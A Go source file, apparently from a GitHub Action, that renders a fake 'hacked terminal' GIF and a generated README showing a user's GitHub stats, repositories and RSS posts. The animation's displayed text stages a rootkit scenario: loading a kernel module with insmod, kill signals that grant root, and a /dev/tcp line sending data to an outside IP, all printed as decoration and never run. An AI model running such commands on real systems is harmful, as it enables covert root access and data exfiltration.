package profile

import (
	"bytes"
	"context"
	"embed"
	"fmt"
	"image"
	"image/jpeg"
	"image/png"
	"io/ioutil"
	"net/http"
	"os"
	"path/filepath"
	"strings"
	"time"

	"github.com/google/go-github/v43/github"
	"github.com/liamg/github-profile-terminal-action/config"
	"github.com/liamg/github-profile-terminal-action/terminal"
	"github.com/liamg/github-profile-terminal-action/theme"
	"github.com/mmcdole/gofeed"
	"github.com/nfnt/resize"
)

//go:embed *.png
var embedded embed.FS

const (
	Width = 830
)

type Profile struct {
	dir    string
	config *config.Config
	gh     *github.Client
	theme  theme.Theme
	term   *terminal.Terminal
	stats  *Stats
}

func New(conf *config.Config) *Profile {
	return &Profile{
		config: conf,
		gh:     newGithubClient(conf),
		theme:  theme.ByName(conf.Theme),
	}
}

func (p *Profile) Generate(ctx context.Context, dir string) error {

	p.dir = dir

	repoBits := strings.Split(p.config.Context.Repository, "/")
	if len(repoBits) != 2 {
		return fmt.Errorf("invalid repository: %s", p.config.Context.Repository)
	}
	if repoBits[0] != repoBits[1] {
		return fmt.Errorf(
			"this action should be run on a special profile repository e.g. 'github.com/visitor/visitor', "+
				"'%s' does not appear to be such a repo", p.config.Context.Repository,
		)
	}

	if err := os.MkdirAll(dir, 0o700); err != nil {
		return fmt.Errorf("failed to create output dir: %w", err)
	}

	readme, err := os.Create(filepath.Join(dir, "README.md"))
	if err != nil {
		return fmt.Errorf("failed to create README.md: %w", err)
	}
	defer func() { _ = readme.Close() }()

	// 1. stats: commits, PRs, stars,

	//user, _, err := p.gh.Users.Get(ctx, "")
	//if err != nil {
	//return fmt.Errorf("github api error: %w", err)
	//}

	p.term = terminal.New(Width, 600, nil, p.theme)

	if err := p.boot(); err != nil {
		return err
	}

	if err := p.login(ctx); err != nil {
		return err
	}

	if err := p.showStats(ctx); err != nil {
		return err
	}

	if err := p.term.ToGif(filepath.Join(p.dir, "os.gif"), true); err != nil {
		return err
	}

	fmt.Println("Adding terminal to markdown...")
	if _, err := readme.Write([]byte(fmt.Sprintf(`![gifOS](%s)

`, "os.gif"))); err != nil {
		return err
	}

	// 2. social links
	if p.config.TwitterUsername != "" {
		twitterLink := fmt.Sprintf("[![Follow on Twitter](https://shields.io/twitter/follow/%s?label=Follow)](https://twitter.com/%[1]s) ", p.config.TwitterUsername)
		if _, err := readme.Write([]byte(twitterLink)); err != nil {
			return err
		}
	}

	// 3. top projects
	stats, err := p.Stats(ctx)
	if err != nil {
		return err
	}
	if _, err := readme.Write([]byte("\n---\n\n## Popular Repositories\n<table>\n")); err != nil {
		return err
	}
	popular := stats.OwnedRepositories
	if len(popular) > 18 {
		popular = popular[:18]
	}
	for _, repo := range popular {
		if _, err := readme.Write([]byte(fmt.Sprintf("<tr><td><a href=\"%s\">%s</a></td><td>%s</td><td align=\"center\" width=\"12%%\">%d :star:</td></tr>\n", repo.GetHTMLURL(), repo.GetName(), repo.GetDescription(), repo.GetStargazersCount()))); err != nil {
			return err
		}
	}
	if _, err := readme.Write([]byte("</table>\n\n")); err != nil {
		return err
	}

	// 4. latest posts (rss)
	if p.config.FeedURL != "" {
		fp := gofeed.NewParser()
		feed, err := fp.ParseURL(p.config.FeedURL)
		if err != nil {
			return err
		}
		if _, err := readme.WriteString("## Latest Posts\n"); err != nil {
			return err
		}
		posts := feed.Items
		if len(posts) > 4 {
			posts = posts[:4]
		}
		for _, post := range posts {
			_, err := readme.WriteString(
				fmt.Sprintf(
					"\n - %s [%s](%s)",
					post.PublishedParsed.Format("Mon, 02 Jan 2006"),
					post.Title,
					post.Link,
				),
			)
			if err != nil {
				return err
			}
		}
	}

	// 5. footer
	if _, err := readme.WriteString(fmt.Sprintf("\n\n<sub><i>Automatically generated by [liamg/github-profile-terminal-action](https://github.com/liamg/github-profile-terminal-action) at %s</i></sub>\n", time.Now().Format(time.RFC1123))); err != nil {
		return fmt.Errorf("write failed: %w", err)
	}
	return nil
}

func (p *Profile) boot() error {
	term := p.term

	f, err := embedded.Open("gh.png")
	if err != nil {
		return err
	}

	gh, err := png.Decode(f)
	if err != nil {
		return err
	}

	ratio := float64(gh.Bounds().Max.X) / float64(gh.Bounds().Max.Y)

	iw := 0.333 * float64(Width)
	ih := iw / ratio
	newImage := resize.Resize(uint(iw), uint(ih), gh, resize.Lanczos3)
	term.DrawImage(image.Rect(Width-(int(iw)+30), 30, Width, int(ih)+30), newImage)

	term.Frame(40)
	term.ShowCursor(false)

	term.Println("Release 0x0539 OS v7.3.4 - Build date 20/01/2031")
	term.Frame(20)
	term.Println("(C) 2022 GIF Systems Inc.\n\n\n")
	term.Frame(20)
	term.Println("GH Profile 0 Rev 1000")
	term.Frame(20)

	term.Println("\n\nALERT - System compromised: pwnd by hoWo 1337!\n")
	term.Frame(20)

	term.CursorToLastRow()
	term.Print("Press DEL to enter setup, ESC to skip memory test")
	term.CursorToRow(11)
	term.Frame(20)

	term.Println("Main Processor: GifCPU - 999GHz")
	term.Frame(20)
	for i := 0; i < 0x40000000; i += 0x4ffffff {
		term.ClearLine()
		term.CursorToHome()
		term.Print(fmt.Sprintf("Memory Check: %d", i))
		term.Frame(1)
	}
	term.ClearLine()
	term.CursorToHome()
	term.Println("Memory Check: 1048576K + 1024K Shared Memory\n")
	term.Frame(20)
	term.Println("WAIT...")
	term.Frame(100)

	term.Clear()
	term.Frame(100)

	term.Print("Starting 0x0539...")
	term.Frame(150)
	term.Clear()

	return nil
}

func (p *Profile) login(_ context.Context) error {

	p.term.Clear()
	p.term.Println("0x0539 pwnd v0.1.0 tty1")
	p.term.Println("")
	p.term.Print("login: ")
	p.term.ShowCursor(true)
	p.term.Frame(150)
	p.term.Type("howosecurity\n", terminal.Fast)

	p.term.Print("password: ")
	p.term.ShowCursor(true)
	p.term.Frame(200)
	p.term.Println("")
	p.term.Println("")
	p.term.Println(fmt.Sprintf("Last login %s on tty1", time.Now().Add(time.Hour*-24).Format(time.RFC1123)))
	p.term.Print(`Welcome to 0x0539 v0.1.0

  * Documentation: https://github.com/liamg/github-profile-terminal-action

81 packages can be updated.
14 updates are security updates.
`)
	p.term.Frame(50)

	return nil
}

var prompt string = "\nhowosecurity@vds-73125908:~$ "

func (p *Profile) prompt() {
	p.term.Print(prompt)
	p.term.ShowCursor(true)
	p.term.Frame(75)
}

func (p *Profile) showStats(ctx context.Context) error {

	p.prompt()

	p.term.Frame(75)

	p.term.Type("ls -lAh", terminal.Fast)
	p.term.Print(`
Total 2.5M
-rwxr-wr--   6 howosecurity howosecurity 4.0K Dec 17 13:07 b4ckd0oR.py
-rw-r--r--   1 root root                 2.0M Jan  2 13:12 anakin.ko
-rwxr-xr-x   1 howosecurity howosecurity 732  Apr 21 19:26 copy-fail.py
-rwxrwxr-x   1 howosecurity howosecurity 54   Jun  3 17:04 rk-helper.sh
`)
	p.prompt()
	p.term.Frame(75)

	stats, err := p.Stats(ctx)
	if err != nil {
		return err
	}

	user := stats.User

	p.term.Type("sudo insmod anakin.ko", terminal.Fast)
	p.term.Print("\n[sudo] password for howosecurity: ")
	p.term.Frame(200)

	p.prompt()
	p.term.Frame(75)
	p.term.Type(`kill -67 $(printf "%d" 0x$(echo -n help | xxd -p))`, terminal.Fast)
	p.term.Println(`
kill: kill 1751477360 failed: permission denied`)

	p.prompt()
	p.term.Frame(50)
	p.term.Type(`sudo dmesg -l debug | tail`, terminal.Fast)
	p.term.Print(`
               =========== AnakinRK Help Menu ===========
[ 4715.811268] =    CMD    Signal    Description    =
[ 4715.811269] ==========================================
[ 4715.811269] =    root    67    Get Root    =
[ 4715.811271] =    hide    67    Toggle hide    =
[ 4715.811271] =    none    69    Toggle hide port    =
[ 4715.811272] =    help    67    Help Menu    =
[ 4715.811273] ==========================================

`)

	p.prompt()
	p.term.Frame(75)

	p.term.Type(`cat rk-helper.sh`, terminal.Fast)
	p.term.Print(`
#/bin/sh
printf "%d" 0x$(printf "%.4s" "$1" | xxd -p)
`)

	p.prompt()
	p.term.Frame(75)

	prompt = "\nroot@vds-73125908:~# "
	p.term.Type(`kill -67 $(./rk-helper root)`, terminal.Fast)
	p.term.Println(`
kill: kill 1919905652 failed: no such process`)

	p.term.Frame(5)
	p.prompt()
	p.term.Frame(75)

	p.term.Type(`whoami`, terminal.Fast)
	p.term.Println("\nroot")

	p.prompt()
	p.term.Frame(75)

	p.term.Type(fmt.Sprintf("echo \"fetch %s\" > /dev/tcp/4.228.31.150/443\n", user.GetLogin()), terminal.Fast)
	p.term.ShowCursor(false)

	p.term.Print("\nConnecting...")
	p.term.Type("............", terminal.VeryFast)
	p.term.Print("\nSending query...")
	p.term.Type("............................\n", terminal.VeryFast)

	p.term.Println("")
	p.term.Println("")
	p.term.Println(" -- User Details")
	p.term.Print("   User ID:     ")
	p.term.SetHighlight(true)
	p.term.Println(fmt.Sprintf("%d", user.GetID()))
	p.term.SetHighlight(false)
	p.term.Print("   Username:    ")
	p.term.SetHighlight(true)
	p.term.Println(user.GetLogin())
	p.term.SetHighlight(false)
	p.term.Println("")
	p.term.Println("")
	p.term.Println("")
	p.term.Println("")
	p.term.Println("")

	p.term.Println(" -- Statistics")
	p.term.Print("   Total Stars:     ")
	p.term.SetHighlight(true)
	p.term.Println(fmt.Sprintf("%d", stats.TotalStars))
	p.term.SetHighlight(false)
	p.term.Print("   Total Followers: ")
	p.term.SetHighlight(true)
	p.term.Println(fmt.Sprintf("%d", stats.TotalFollowers))
	p.term.SetHighlight(false)
	p.term.Println("")
	p.term.Println("")
	p.term.Println("")

	resp, err := http.Get(stats.User.GetAvatarURL())
	if err != nil {
		return err
	}
	defer resp.Body.Close()

	data, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return err
	}

	img, err := png.Decode(bytes.NewReader(data))
	if err != nil {
		img, err = jpeg.Decode(bytes.NewReader(data))
		if err != nil {
			return err
		}
	}

	ratio := float64(img.Bounds().Max.X) / float64(img.Bounds().Max.Y)
	iw := 0.25 * float64(Width)
	ih := iw / ratio
	resized := resize.Resize(uint(iw), uint(ih), img, resize.Lanczos3)
	p.term.DrawImage(image.Rect(Width-(int(iw)+30), 600-(int(ih)+30), Width, 600), resized)
	p.term.Frame(500)
	return nil
}
